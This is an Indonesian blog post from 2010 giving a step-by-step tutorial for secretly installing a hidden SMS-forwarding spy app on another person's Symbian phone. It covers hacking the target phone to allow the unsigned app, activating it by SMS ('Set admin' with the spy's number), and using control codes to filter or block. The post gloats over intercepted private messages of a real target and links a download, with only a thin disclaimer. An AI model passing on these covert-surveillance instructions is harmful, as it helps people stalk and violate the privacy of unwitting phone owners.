Label

SKIN REBEL COMUNITY

WELCOME TO ROCK N ROLL.....

Rabu, 10 November 2010

sadap sms s60v3

Test N73(hacked)

Akirnya janjiku aku tepati sudah.
Jujur.. Aplikasi yang satu ini bikin aku tambah sibuk jg bikin tambah boros pulsa.
Bukan karena aplikasinya, tapi karena banyaknya sms masuk yg menginginkan aplikasi ini. Maaf bagi teman2 yg sms'nya tdk trbalas dari aku, mhon di maklumi. Sebagai gantinya telah aku tepati janjiku untuk mengulasnya di sini

Nama aplikasi ini SMS monitor, fungsi dari aplikasi ini adalah mentransfer semua aktifitas sms masuk dan sms keluar dari ponsel target ke nomor kamu (penyadap).
Aplikasi ini bekerja pada pada ponsel s60v3 dan s60v5, jika ponsel yang mau di sadap bukan type tersebut mendingan urungkan niat untuk bisa menyadap sms'nya.

aplikasi ini diberikan gratis, kamu bisa menikmati aplikasi tanpa dipungut biaya, sayangnya aplikasi ini masih unsigned.
Disinilah letak kesulitan untuk menginstal aplikasi ini di ponsel target. Karena aplikasi ini bisa di instal di ponsel target jika ponsel target sudah mensigned aplikasi ini, tapi ada cara gampang agar aplikasi ini bisa di instal di ponsel target, yaitu dengan meng hack ponsel target, menghack ponsel symbian bukanlah pekerja'an yg sulit, terbukti hack ponsel symbian yang saya lakukan di ponsel target cuma membutuhkan waktu kurang dari 1 menit. Untuk lebih jelasnya silahkan baca cara menghack ponsel symbian s60v3 dengan hellocarbidedisini

Ingat..aku bisa hack ponsel target dng waktu kurang dari 1 menit, dari situ sudah jelas ketahuan klo menghack ponsel symbian bukanlah pekerja'an yg sulit.

Jika urusan hack meng hack sdh bisa kamu lakukan, sekarang kita bahas tentang cara pengguna'an aplikasi ini.

1. Siapkan 2 ponsel, satu ponsel kamu (sebagai penyadap), dan satunya ponsel target (yang di sadap), yg tentunya sudah kamu hack.
Ponsel target harus symbian v3 atau v5, sedang ponsel kamu (penyadap) bisa type apa aja, bahkan ponsel yg masih hitam putih pun jg bisa.

2. Selanjutnya instal aplikasi SMSmonitor ke ponsel target, tenang aja.. Aplikasi ini sifatnya hidden/sembunyi, jadi tidak akan muncul di ponsel target sehingga pemilik ponsel tidak tahu klo ponselnya telah di pasang aplikasi penyadap.

3. Jika penginstalan sudah selesai, selanjutnya melakukan pengaktifan aplikasi tersebut dengan cara mengirim sms ke ponsel target
Isi sms sebagai berikut:
Ketik Set admin 081329144XXX terus kirim ke ponsel target.
Catatan:
Nomor 081329144XXX adalah nomor kamu/penyadap, artinya semua sms masuk dan keluar di ponsel target secara otomatis akan dikirim ke nomor 081329144XXX. Silahkan ganti nomor tersebut dengan nomor kamu.

Sekarang kamu coba sms ke ponsel target pake sembarang nomor, selang beberapa menit, sms yg kamu kirimkan ke ponsel target tadi akan dikirim balik ke nomor yg telah kamu jadikan penyadap tadi.

Contoh gambar aktifitas sms yg telah berhasil aku sadap

Gambar 1
image

gambar di atas ponsel yg aku sadap sedang melakukan sms ke nomor 0857251XXXXX, yg isinya " Maap mas aq tdk bisa. Aq mhon jng sms lgi. Besok aq udh di antar ma mas ryan
To:+62857251XXXXX "

Gambar 2
image

Gambar di atas ponsel yg aku sadap mendapat sms dari 0857251XXXXX, yang isinya " Plizz ak mhon vy, ak pngen ktemu km skali ini aja. Ak mhon..
Fr:+62857251XXXXX "


Waow...! Menyenangkan bukan biggrin. Kita jadi tau semua aktifitas sms masuk dan keluar di ponsel target tanpa diketahui ama pemilik ponselnya.

(mudah2an pemilik ponsel yg telah aku sadap ini tidak membuka dan membac postinganku ini, kalau sampe tahu ntar bisa gawat.. biggrin)

Berikut ini panduan2 laen untuk mengoperasikan aplikasi tersebut.
Off : Untuk menghentikan sementara penyadapan
On : Mengaktifkan lagi penyadapan
Add sender +628132XXXXXXX, +628572XXXXXXX : Untuk menyadap aktifitas sms dari dan ke nomer tertentu saja.
Add : Untuk kembali menyadap semua nomer ponsel tanpa terkecuali.
Block on : Untuk memblok semua aktifitas telpon masuk dan keluar yang disadap.
Block off : Untuk mematikan blokir telpon diatas .

Kirimkan kode2 di atas melalui sms ke ponsel target

Gimana plend, Apa kamu tertarik untuk mencobanya??
Langsung download aplikasinya disini.

Alternatif laen selain pake SMSmonitor kamu bisa pake sms anywhere, aplikasi ini sudah signed, tapi aplikasi ini berbayar, kamu akan di beri masa coba beberapa hari, setelah itu kamu di haruskan mengeluarkan beberapa dolar untuk membelinya, untuk download silahkan cari di google, sebenarnya dulu aku juga pernah punya aplikasi sms anywhere, tapi terlanjur aku hapus. Mahal sih... biggrin.

Janjiku udah aku tepati, so.. Sms request aplikasi sadap sms aku TUTUP.. ! Thankeyu..

Mohon gunakan aplikasi SMSmonitar dengan bijak, segala dampak negatif karena penyalah guna'an bukan tanggung jawab saya.

Artikel ini bebas di copy paste oleh siapa saja , dan saya tidak melarangnya asal di postingan tidak berbau penyalah guna'an aplikasi ini

Comment

Tidak ada komentar: